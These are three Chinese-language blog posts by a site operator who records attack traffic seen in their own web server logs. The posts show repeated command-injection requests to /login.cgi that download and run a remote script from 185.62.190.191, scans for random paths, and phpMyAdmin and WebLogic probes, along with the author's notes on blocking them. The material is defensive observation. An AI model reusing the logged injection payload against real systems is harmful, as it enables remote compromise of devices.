2018年6月18日 星期一

從 Web Log 學習系統漏洞 15

大概是發現我沒裝phpmyadmin之後, 開始每天跟我 say hello.....
(不過好像跟之前是不同批的人...)

121.100.124.58 - - [16/Jun/2018:22:26:42 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
86.81.235.216 - - [17/Jun/2018:11:49:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
115.75.217.189 - - [17/Jun/2018:12:10:43 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
89.19.176.201 - - [17/Jun/2018:13:31:06 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
213.14.163.113 - - [17/Jun/2018:13:43:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
87.26.31.65 - - [17/Jun/2018:22:49:06 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
59.3.28.131 - - [18/Jun/2018:13:46:48 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"

2018年6月6日 星期三

從 Web Log 學習系統漏洞 14

drygcfp 不曉得是什麼鬼東西, 擋不下來, IP全來自中國, 只好把這些網段全封鎖吧

113.63.81.148 - - [06/Jun/2018:13:49:44 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220
110.167.88.198 - - [06/Jun/2018:13:49:48 +0800] "GET /drygcfp232.KXw9KGV.ks3 HTTP/1.1" 404 220
106.45.0.51 - - [06/Jun/2018:13:49:49 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220
124.235.138.148 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpZ0Z.qvckqlm.ag0 HTTP/1.1" 404 220
1.189.141.222 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpR2R.pCTep9f.Sd2 HTTP/1.1" 404 220
150.255.87.74 - - [06/Jun/2018:13:50:06 +0800] "GET /drygcfpTwT.OHyaOjG.hIw HTTP/1.1" 404 220
110.167.94.132 - - [06/Jun/2018:13:50:21 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220

2018年6月5日 星期二

從 Web Log 學習系統漏洞 13

這個 phpmyadmin 的入侵測試有幾個特徵, 每次大概一分鐘的測試, 每次測試使用單一IP (每次不同 IP, 所以防火牆不好擋), 開頭會有 "PROPFIND / HTTP/1.1" 405 236 "-" "-" 及 "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 226 "-" " 這兩個要求, 之前架站時有用過一個小程式, 如果短時間內網站有大量存取要求時會被自動加入防火牆阻擋, 不過那程式連正常的存取也擋, 後來就沒繼續用了, 使用阿帕契的阻擋規則也只是從 error 404 變成 403, 沒什麼意義, 再繼續找找看有什麼方法解決


47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "PROPFIND / HTTP/1.1" 405 236 "-" "-"
47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"
47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /index.php HTTP/1.1" 404 207 "-" "Mozilla/5.0"
47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"